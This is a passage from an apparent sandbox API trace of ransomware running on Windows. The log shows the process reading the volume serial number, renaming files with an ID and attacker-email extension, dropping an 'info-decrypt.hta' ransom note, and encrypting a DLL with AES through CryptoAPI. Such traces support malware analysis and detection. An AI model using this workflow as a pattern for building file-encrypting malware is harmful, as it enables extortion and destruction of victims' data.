This=0xb5bba4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0213.724] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0213.724] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5bb04) returned 0x0 [0213.724] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bb04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.724] WbemLocator:IUnknown:Release (This=0xb5bb04) returned 0x3 [0213.724] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0213.724] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0213.724] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5bb8c) returned 0x0 [0213.724] WbemLocator:IRpcOptions:Query (in: This=0xb5bb8c, pPrx=0xb5bba4, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0213.724] WbemLocator:IUnknown:Release (This=0xb5bb8c) returned 0x3 [0213.724] WbemLocator:IUnknown:Release (This=0xb5bba4) returned 0x2 [0213.724] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0213.724] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0213.724] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x60336e4) returned 0x0 [0213.724] WbemLocator:IUnknown:AddRef (This=0x60336e4) returned 0x4 [0213.724] WbemLocator:IUnknown:Release (This=0x60336e4) returned 0x3 [0213.724] WbemLocator:IUnknown:Release (This=0x60336e4) returned 0x2 [0213.724] SysStringLen (param_1=0x0) returned 0x0 [0213.725] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029e30, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0213.725] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0213.725] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0213.725] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0213.725] WbemLocator:IUnknown:AddRef (This=0xb5bba4) returned 0x3 [0213.725] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5bba4) returned 0x0 [0213.725] WbemLocator:IUnknown:Release (This=0xb5bba4) returned 0x3 [0213.725] WbemLocator:IUnknown:Release (This=0xb5bba4) returned 0x2 [0213.725] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0213.725] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0213.725] IWbemServices:GetObject (in: This=0x60336e4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6027fe8, ppCallResult=0x0) returned 0x0 [0213.913] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029dc0, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0213.913] WbemDefPath:IWbemPath:GetText (in: This=0x6029dc0, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0213.913] WbemDefPath:IWbemPath:GetText (in: This=0x6029dc0, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.913] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3662d54*=0, plFlavor=0x3662d58*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3662d54*=8, plFlavor=0x3662d58*=0) returned 0x0 [0213.913] SysStringByteLen (bstr="9C354B42") returned 0x10 [0213.913] SysStringByteLen (bstr="9C354B42") returned 0x10 [0213.913] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3662d54*=8, plFlavor=0x3662d58*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3662d54*=8, plFlavor=0x3662d58*=0) returned 0x0 [0213.913] SysStringByteLen (bstr="9C354B42") returned 0x10 [0213.913] SysStringByteLen (bstr="9C354B42") returned 0x10 [0213.913] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm", lpFilePart=0x0) returned 0x34 [0213.913] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x57 [0213.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0213.913] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktigt.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x38af0e80, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0213.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0213.913] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktigt.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktigt.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0213.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ef7c) returned 1 [0213.914] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl", nBufferLength=0x105, lpBuffer=0x8f6ea84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl", lpFilePart=0x0) returned 0x2c [0213.914] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\", nBufferLength=0x105, lpBuffer=0x8f6ea58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\", lpFilePart=0x0) returned 0x2d [0213.914] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\*", lpFindFileData=0x8f6eca4 | out: lpFindFileData=0x8f6eca4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f290 [0213.915] FindNextFileW (in: hFindFile=0xb7f290, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0213.915] FindNextFileW (in: hFindFile=0xb7f290, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x19798, dwReserved0=0x0, dwReserved1=0x0, cFileName="AiodLite.dll", cAlternateFileName="")) returned 1 [0213.915] FindNextFileW (in: hFindFile=0xb7f290, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0213.915] FindClose (in: hFindFile=0xb7f290 | out: hFindFile=0xb7f290) returned 1 [0213.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ef3c) returned 1 [0213.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ef48) returned 1 [0213.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ef7c) returned 1 [0213.915] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl", nBufferLength=0x105, lpBuffer=0x8f6ea84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl", lpFilePart=0x0) returned 0x2c [0213.916] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\", nBufferLength=0x105, lpBuffer=0x8f6ea58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\", lpFilePart=0x0) returned 0x2d [0213.916] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\*", lpFindFileData=0x8f6eca4 | out: lpFindFileData=0x8f6eca4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f290 [0213.916] FindNextFileW (in: hFindFile=0xb7f290, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0213.916] FindNextFileW (in: hFindFile=0xb7f290, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x19798, dwReserved0=0x0, dwReserved1=0x0, cFileName="AiodLite.dll", cAlternateFileName="")) returned 1 [0213.916] FindNextFileW (in: hFindFile=0xb7f290, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x19798, dwReserved0=0x0, dwReserved1=0x0, cFileName="AiodLite.dll", cAlternateFileName="")) returned 0 [0213.916] FindClose (in: hFindFile=0xb7f290 | out: hFindFile=0xb7f290) returned 1 [0213.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ef3c) returned 1 [0213.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ef48) returned 1 [0213.917] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll", nBufferLength=0x105, lpBuffer=0x8f6e9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll", lpFilePart=0x0) returned 0x39 [0213.917] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\info-decrypt.hta", lpFilePart=0x0) returned 0x3d [0213.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee58) returned 1 [0213.917] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\esl\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6eed4 | out: lpFileInformation=0x8f6eed4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0213.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee54) returned 1 [0213.917] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll", nBufferLength=0x105, lpBuffer=0x8f6e9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll", lpFilePart=0x0) returned 0x39 [0213.917] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6e898, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\info-decrypt.hta", lpFilePart=0x0) returned 0x3d [0213.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ed8c) returned 1 [0213.917] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\esl\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x598 [0213.918] GetFileType (hFile=0x598) returned 0x1 [0213.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ed88) returned 1 [0213.918] GetFileType (hFile=0x598) returned 0x1 [0213.918] WriteFile (in: hFile=0x598, lpBuffer=0x3750fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x8f6ee50, lpOverlapped=0x0 | out: lpBuffer=0x3750fc0*, lpNumberOfBytesWritten=0x8f6ee50*=0x1000, lpOverlapped=0x0) returned 1 [0213.919] WriteFile (in: hFile=0x598, lpBuffer=0x3750fc0*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x8f6ee24, lpOverlapped=0x0 | out: lpBuffer=0x3750fc0*, lpNumberOfBytesWritten=0x8f6ee24*=0x55e, lpOverlapped=0x0) returned 1 [0213.919] CloseHandle (hObject=0x598) returned 1 [0213.919] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll", nBufferLength=0x105, lpBuffer=0x8f6e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll", lpFilePart=0x0) returned 0x39 [0213.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea4) returned 1 [0213.919] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\esl\\aiodlite.dll"), fInfoLevelId=0x0, lpFileInformation=0x3751fdc | out: lpFileInformation=0x3751fdc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x19798)) returned 1 [0213.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea0) returned 1 [0213.920] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll", nBufferLength=0x105, lpBuffer=0x8f6e8e4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll", lpFilePart=0x0) returned 0x39 [0213.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6edd8) returned 1 [0213.920] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\esl\\aiodlite.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x598 [0213.920] GetFileType (hFile=0x598) returned 0x1 [0213.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6edd4) returned 1 [0213.920] GetFileType (hFile=0x598) returned 0x1 [0213.920] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x8f6eee0 | out: lpFileSizeHigh=0x8f6eee0*=0x0) returned 0x19798 [0213.921] ReadFile (in: hFile=0x598, lpBuffer=0x8caa300, nNumberOfBytesToRead=0x19798, lpNumberOfBytesRead=0x8f6ee8c, lpOverlapped=0x0 | out: lpBuffer=0x8caa300*, lpNumberOfBytesRead=0x8f6ee8c*=0x19798, lpOverlapped=0x0) returned 1 [0213.927] CloseHandle (hObject=0x598) returned 1 [0213.927] CryptAcquireContextW (in: phProv=0x8f6ee2c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee2c*=0xbe11b8) returned 1 [0213.928] CryptGenRandom (in: hProv=0xbe11b8, dwLen=0x10, pbBuffer=0x3752504 | out: pbBuffer=0x3752504) returned 1 [0214.659] CryptImportKey (in: hProv=0xbe11b8, pbData=0x3748efc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6edfc | out: phKey=0x8f6edfc*=0xb7f9d0) returned 1 [0214.659] CryptContextAddRef (hProv=0xbe11b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0214.659] CryptContextAddRef (hProv=0xbe11b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0214.659] CryptDuplicateKey (in: hKey=0xb7f9d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6edec | out: phKey=0x8f6edec*=0xb7f310) returned 1 [0214.659] CryptContextAddRef (hProv=0xbe11b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0214.659] CryptSetKeyParam (hKey=0xb7f310, dwParam=0x4, pbData=0x3748fdc*=0x1, dwFlags=0x0) returned 1 [0214.659] CryptSetKeyParam (hKey=0xb7f310, dwParam=0x1, pbData=0x3748fa8, dwFlags=0x0) returned 1 [0214.659] CryptEncrypt (in: hKey=0xb7f310, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xb301968*, pdwDataLen=0x8f6ee58*=0x197a0, dwBufLen=0x197a0 | out: pbData=0xb301968*, pdwDataLen=0x8f6ee58*=0x197a0) returned 1 [0214.660] CryptEncrypt (in: hKey=0xb7f310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3749004*, pdwDataLen=0x8f6ee60*=0x0, dwBufLen=0x10 | out: pbData=0x3749004*, pdwDataLen=0x8f6ee60*=0x10) returned 1 [0214.662] CryptDestroyKey (hKey=0xb7f9d0) returned 1 [0214.662] CryptReleaseContext (hProv=0xbe11b8, dwFlags=0x0) returned 1 [0214.662] CryptReleaseContext (hProv=0xbe11b8, dwFlags=0x0) returned 1 [0214.662] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll", nBufferLength=0x105, lpBuffer=0x8f6e8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll", lpFilePart=0x0) returned 0x39 [0214.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6edc4) returned 1 [0214.662] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\esl\\aiodlite.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0214.668] GetFileType (hFile=0x320) returned 0x1 [0214.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6edc0) returned 1 [0214.669] GetFileType (hFile=0x320) returned 0x1 [0214.669] WriteFile (in: hFile=0x320, lpBuffer=0x3749610*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6ee54, lpOverlapped=0x0 | out: lpBuffer=0x3749610*, lpNumberOfBytesWritten=0x8f6ee54*=0x20, lpOverlapped=0x0) returned 1 [0214.670] CloseHandle (hObject=0x320) returned 1 [0214.670] CoTaskMemAlloc (cb=0x20c) returned 0x66cdfc8 [0214.670] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66cdfc8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0214.670] CoTaskMemFree (pv=0x66cdfc8) [0214.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0214.670] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee00 | out: ppv=0x8f6ee00*=0xb51e34) returned 0x0 [0214.670] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edf8 | out: pAptType=0x8f6edf8*=1) returned 0x0 [0214.670] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edfc | out: ppvObject=0x8f6edfc*=0x0) returned 0x80004002 [0214.670] IUnknown:Release (This=0xb51e34) returned 0x1 [0214.671] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e768 | out: ppv=0x8f6e768*=0x60271c0) returned 0x0 [0214.671] WbemDefPath:IUnknown:QueryInterface (in: This=0x60271c0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e980 | out: ppvObject=0x8f6e980*=0x0) returned 0x80004002 [0214.672] 